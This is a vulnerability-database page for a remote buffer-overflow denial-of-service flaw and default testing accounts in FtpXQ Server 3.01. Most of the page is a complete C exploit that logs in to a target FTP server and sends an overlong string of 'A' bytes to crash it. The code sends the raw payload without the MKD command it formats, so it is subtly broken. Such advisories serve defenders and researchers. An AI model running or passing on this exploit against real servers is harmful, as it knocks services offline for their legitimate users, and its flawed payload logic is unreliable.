Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FtpXQ Server 3.01 MKD Command Remote Overflow DoS

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 10 Views

FtpXQ Server 3.01 remote vulnerabilities, denial-of-service, remote buffer overflow, default testing accounts, WinsockQ based. Also, exploit code for Denial of service

Code

                                                source: http://www.securityfocus.com/bid/20721/info

DataWizard FtpXQ Server is prone to multiple remote vulnerabilities:

- A remote denial-of-service issue occurs because the application fails to perform adequate bounds checks on user-supplied data before copying it to an insufficiently sized buffer. An attacker could exploit this issue to crash the application, denying access to legitimate users.

- The application creates two testing accounts by default. An attacker can access these accounts to gain read/write privileges on the server, which could result in the compromise of the affected computer.

FtpXQ Server 3.01 is vulnerable; other version may also be affected.

/*
* 0xf_ftpxq.c - FTPXQ Denial of service exploit.
* Federico Fazzi <federicoautistici.org>
*
* advisory by Eric Sesterhenn.
* -- Server built using the WinsockQ from DataWizard Technologies. A
security
* -- vulnerability in the product allows remote attackers to overflow an
* -- internal buffer by providing an overly long "make directory" request.
*
* r20061025.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

// AAAAAAAAAAAAAAAA..AA*255 in hex format.
char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char **argv) {
    int sd;
    socklen_t len;
    struct sockaddr_in saddr;
    struct hostent *he;
    char buf[512], tmpbuf[128];

    if(argc != 5) {
        printf("FTPXQ Server - Denial of service exploit.\n"
               "Federico Fazzi <federicoautistici.org>\n\n"
               "usage: %s <hostname> <port> <user> <password>\n", argv[0]);
            exit(1);
    }

    if((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname()");
            exit(1);
    }

    // init socket
    if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
            exit(1);
    }

    // setup struct
    bzero((char *) &saddr, sizeof(saddr));
    saddr.sin_family = AF_INET;
    bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length);
    saddr.sin_port = htons(atoi(argv[2]));

    len = sizeof(struct sockaddr);
    // init connection
    if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
            perror("connect()");
            exit(1);
    }
    printf("FTPXQ Server - Denial of service exploit.\n"
           "Federico Fazzi <federicoautistici.org>\n"
           "---------------------------------------\n");
    puts("connecting..\t\t done");

    // sending a USER data to daemon
    sprintf(buf, "USER %s\r\n", argv[3]);
    write(sd, buf, strlen(buf));
    puts("sending USER data..\t done");

    // sending a PASS data to daemon
    sprintf(buf, "PASS %s\r\n", argv[4]);
    write(sd, buf, strlen(buf));
    puts("sending PASS data..\t done");

    // sending a BOF string with MKD command to host
    sprintf(buf, "MKD %s", bof);
    write(sd, bof, strlen(bof));
    puts("sending MKD bof string.. done");

    // now checking if server i down
    if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
        puts("[!] server doesn't vulnerable");
    else
        puts("[+] server getting down.. done");
    close(sd);

    return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7
ftpxq servervulnerabilitiesdenial-of-servicebuffer overflowtesting accountswinsockqexploit code
10